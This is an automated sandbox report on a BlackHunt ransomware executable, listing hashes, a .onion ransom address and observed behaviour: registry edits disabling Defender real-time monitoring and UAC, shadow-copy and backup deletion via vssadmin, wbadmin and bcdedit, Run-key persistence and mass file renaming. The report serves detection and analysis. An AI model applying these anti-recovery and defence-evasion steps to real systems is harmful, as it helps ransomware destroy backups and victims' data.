Analysis
-
max time kernel
168s -
max time network
192s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:24
Static task
static1
Behavioral task
behavioral1
Sample
f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe
Resource
win10v2004-20231215-en
General
-
Target
f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe
-
Size
707KB
-
MD5
a9e8f79689c24f766e271396f15096ca
-
SHA1
58167008dbd54e7a51dcb75ffa3350df27b7bb81
-
SHA256
f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b
-
SHA512
7d59bbb65822279f3af765100c9f58f18c40a7319f7017809d08ed73314f17ff00bdbe67b2cba6eefcb0eb063b27717bb94abec4e52008f2a5b5e99d161a908b
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j8Cvnh:6uaTmkZJ+naie5OTamgEoKxLWaMh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 680 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5632 bcdedit.exe 5644 bcdedit.exe -
Renames multiple (453) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5908 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\L: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\X: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\N: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\S: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\H: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\Z: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\E: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\R: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\Y: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\U: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\G: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\J: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\O: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\W: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\I: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\K: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\T: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\A: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\V: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\B: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\M: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\webkit.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_es.properties f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\javafx.properties f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\local_policy.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jre-1.8\lib\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\splash_11-lic.gif f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\applet\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\calendars.properties f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\access-bridge-64.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\asm.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jre-1.8\bin\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\management\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11cryptotoken.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\management\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management-agent.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\gstreamer.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_CopyDrop32x32.gif f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\zlib.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jre-1.8\bin\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\COPYRIGHT f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyDrop32x32.gif f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\psfontj2d.properties f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\icu.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\javaws.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\javafx-mx.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\[email protected] f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\MSBuild\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11wrapper.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\dom.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xalan.md f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\hijrah-config-umalqura.properties f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 544 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5524 vssadmin.exe 5628 vssadmin.exe 5516 vssadmin.exe 1476 vssadmin.exe 2428 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeRestorePrivilege 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeBackupPrivilege 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeTakeOwnershipPrivilege 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeAuditPrivilege 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeSecurityPrivilege 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeIncBasePriorityPrivilege 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeBackupPrivilege 1752 vssvc.exe Token: SeRestorePrivilege 1752 vssvc.exe Token: SeAuditPrivilege 1752 vssvc.exe Token: SeBackupPrivilege 2160 wbengine.exe Token: SeRestorePrivilege 2160 wbengine.exe Token: SeSecurityPrivilege 2160 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2220 wrote to memory of 3940 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 90 PID 2220 wrote to memory of 3940 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 90 PID 2220 wrote to memory of 3772 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 92 PID 2220 wrote to memory of 3772 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 92 PID 2220 wrote to memory of 4192 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 94 PID 2220 wrote to memory of 4192 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 94 PID 2220 wrote to memory of 2892 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 95 PID 2220 wrote to memory of 2892 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 95 PID 2220 wrote to memory of 4128 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 98 PID 2220 wrote to memory of 4128 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 98 PID 2220 wrote to memory of 3808 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 99 PID 2220 wrote to memory of 3808 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 99 PID 2220 wrote to memory of 2788 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 107 PID 2220 wrote to memory of 2788 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 107 PID 2220 wrote to memory of 3336 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 106 PID 2220 wrote to memory of 3336 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 106 PID 2220 wrote to memory of 2976 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 102 PID 2220 wrote to memory of 2976 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 102 PID 2220 wrote to memory of 1564 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 108 PID 2220 wrote to memory of 1564 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 108 PID 2220 wrote to memory of 2908 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 110 PID 2220 wrote to memory of 2908 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 110 PID 2220 wrote to memory of 852 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 112 PID 2220 wrote to memory of 852 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 112 PID 2220 wrote to memory of 3680 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 114 PID 2220 wrote to memory of 3680 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 114 PID 3940 wrote to memory of 1236 3940 cmd.exe 187 PID 3940 wrote to memory of 1236 3940 cmd.exe 187 PID 2220 wrote to memory of 2548 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 126 PID 2220 wrote to memory of 2548 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 126 PID 2220 wrote to memory of 1544 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 125 PID 2220 wrote to memory of 1544 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 125 PID 2220 wrote to memory of 5032 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 117 PID 2220 wrote to memory of 5032 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 117 PID 2220 wrote to memory of 4600 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 118 PID 2220 wrote to memory of 4600 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 118 PID 2220 wrote to memory of 2584 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 120 PID 2220 wrote to memory of 2584 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 120 PID 2220 wrote to memory of 4436 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 130 PID 2220 wrote to memory of 4436 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 130 PID 2220 wrote to memory of 2504 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 128 PID 2220 wrote to memory of 2504 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 128 PID 2220 wrote to memory of 2152 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 129 PID 2220 wrote to memory of 2152 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 129 PID 2220 wrote to memory of 556 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 132 PID 2220 wrote to memory of 556 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 132 PID 2220 wrote to memory of 4924 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 134 PID 2220 wrote to memory of 4924 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 134 PID 2220 wrote to memory of 3376 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 139 PID 2220 wrote to memory of 3376 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 139 PID 2220 wrote to memory of 2652 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 140 PID 2220 wrote to memory of 2652 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 140 PID 3772 wrote to memory of 1180 3772 cmd.exe 141 PID 3772 wrote to memory of 1180 3772 cmd.exe 141 PID 2220 wrote to memory of 1192 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 143 PID 2220 wrote to memory of 1192 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 143 PID 2220 wrote to memory of 4848 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 199 PID 2220 wrote to memory of 4848 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 199 PID 4128 wrote to memory of 1916 4128 cmd.exe 142 PID 4128 wrote to memory of 1916 4128 cmd.exe 142 PID 4192 wrote to memory of 1404 4192 cmd.exe 147 PID 4192 wrote to memory of 1404 4192 cmd.exe 147 PID 2220 wrote to memory of 4368 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 154 PID 2220 wrote to memory of 4368 2220 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 154 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe"C:\Users\Admin\AppData\Local\Temp\f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2220 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵PID:1236
-
-
-
